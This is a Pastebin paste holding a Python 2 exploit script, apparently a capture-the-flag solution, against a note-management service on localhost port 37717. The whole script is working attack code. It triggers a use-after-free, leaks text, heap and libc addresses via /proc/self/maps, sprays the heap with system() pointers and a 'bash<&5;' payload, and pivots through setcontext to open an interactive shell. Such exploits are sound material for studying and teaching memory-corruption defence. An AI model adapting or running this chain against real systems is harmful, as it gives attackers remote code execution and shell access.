API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 30th, 2014
1,018
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.55 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python2
  2.  
  3. try:
  4.     import binexpect
  5. except ImportError:
  6.     exit("""
  7. pexpect sucks for sending binary data. binexpect fixes this and can be
  8. found at this url: http://darksaber.tk/wapiflapi/binexpect.py Not sure
  9. if the file will be there for ever, but you don't need this anyway.
  10.  
  11. Code your own sploit ;)
  12. @wapiflapi
  13. """)
  14.  
  15. import struct
  16.  
  17. # The note claiming the favorite item's memory
  18. # should be the only note to use this size.
  19. note_size = 24
  20. def note(data, pad="n"):
  21.     return data.ljust(note_size - 1, pad)
  22.  
  23. if __name__ == '__main__':
  24.  
  25.     target = binexpect.spawn("nc localhost 37717", timeout=None)
  26.  
  27.  
  28.     # SETUP USE AFTER FREE SITUATION
  29.  
  30.     # Setup note0 in the fav item's memory.
  31.     target.expect('Choose an option:')
  32.     target.sendline("6\n0")     # add item
  33.     target.expect('Choose an option:')
  34.     target.sendline("9\n0")     # set fav
  35.     target.expect('Choose an option:')
  36.     target.sendline("8\n0")     # del item
  37.     target.expect('Choose an option:')
  38.     target.sendline('2\n')      # add note
  39.     target.sendline(note("", "o"))
  40.  
  41.  
  42.     # LEAK TEXT, HEAP & LIBC ADDRESSES
  43.  
  44.     # Change fav type and leak text address.
  45.     target.expect('Choose an option:')
  46.     target.sendline("10\n1")    # change fav type
  47.     target.expect('Choose an option:')
  48.     target.sendline('1')        # list notes
  49.     target.expect(' #0: (.{6})')
  50.     base_text = struct.unpack("Q", target.match.group(1) + b'\x00\x00')[0]
  51.     print "base_text: 0x%.16x" % base_text
  52.  
  53.     # Compute other gadgets.
  54.     dump = base_text - 0xd0     # note_from_file() pointer used by the menu
  55.     free = base_text + 0x288    # GOT entry for free()
  56.  
  57.     # Free note and leak heap address.
  58.     target.expect('Choose an option:')
  59.     target.sendline("3\n0")     # change note
  60.     target.sendbinline(note(struct.pack("Q", free)))
  61.     target.expect('Choose an option:')
  62.     target.sendline("11")       # trigger UAF
  63.     target.expect('Choose an option:')
  64.     target.sendline('1')        # list notes
  65.     target.expect(' #0: (.{6})')
  66.     base_heap = struct.unpack("Q", target.match.group(1).ljust(8, b'\0'))[0]
  67.     # reclaim freed space from note0 in note1
  68.     target.expect('Choose an option:')
  69.     target.sendline('2')        # add note
  70.     target.sendline(note("", "o"))
  71.     print "base_heap: 0x%.16x" % base_heap
  72.  
  73.     # Read /proc/self/maps and leak libc address.
  74.     target.expect('Choose an option:')
  75.     target.sendline("3\n0")     # change note
  76.     target.sendbinline(note(struct.pack("Q", dump)))
  77.     target.expect('Choose an option:')
  78.     target.sendline("11")       # trigger UAF
  79.     target.sendline("/proc/self/maps")
  80.     target.expect('Choose an option:')
  81.     target.sendline("1")        # list notes
  82.     target.expect("#2: ([0-9a-fA-F]+)-[0-9a-fA-F]+")
  83.     base_libc = int(target.match.group(1), 16)
  84.     target.expect('Choose an option:')
  85.     target.sendline('5\n2')     # del note
  86.     if base_libc == 0x0000555555554000:
  87.         print "gdb detected, adjusting libc."
  88.         base_libc = 0x00007ffff7a14000
  89.     print "base_libc: 0x%.16x" % base_libc
  90.  
  91.  
  92.     # HEAP SPRAYING
  93.  
  94.     system = base_libc + 0x468f0
  95.     payload = "bash<&5;" # Should be 8 bytes.
  96.  
  97.     print "Heap spraying with system."
  98.     for x in xrange(8):
  99.         target.expect('Choose an option:')
  100.         target.sendline('2')    # add note
  101.         target.sendbinline(" " * 16 + payload + struct.pack("Q", system))
  102.  
  103.     print "Deleting notes in order to empty the array."
  104.     for _ in xrange(8):
  105.         target.expect('Choose an option:')
  106.         target.sendline('5\n2') # del note
  107.  
  108.     # Shouldn't overwrite the previous ones since
  109.     # those have a different size.
  110.     print "Filling array with pointers to payload."
  111.     for x in xrange(8):
  112.         target.expect('Choose an option:')
  113.         target.sendline('2')    # add note
  114.         target.sendline(" " * 15 + payload)
  115.  
  116.  
  117.     # SETCONTEXT
  118.  
  119.     print "Setting up trampoline."
  120.     setcontext = base_libc + 0x47490 + 87
  121.     target.expect('Choose an option:')
  122.     target.sendline('2')
  123.     target.sendbinline(struct.pack("Q", setcontext))
  124.  
  125.     print "Calling setcontext."
  126.     trampoline = base_heap + 0x370
  127.     target.expect('Choose an option:')
  128.     target.sendline("3\n0")
  129.     target.sendbinline(note(struct.pack("Q", trampoline)))
  130.     target.expect('Choose an option:')
  131.     target.sendline("11")
  132.  
  133.     # Get a proper shell.
  134.     raw_input("Got you a shell. Escape character is '^]'. ok? ")
  135.     target.sendline("""python -c 'import pty; pty.spawn("bash")' 1>&0 2>&0""")
  136.     target.interact()
  137.  
  138.     print "Bye bye."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!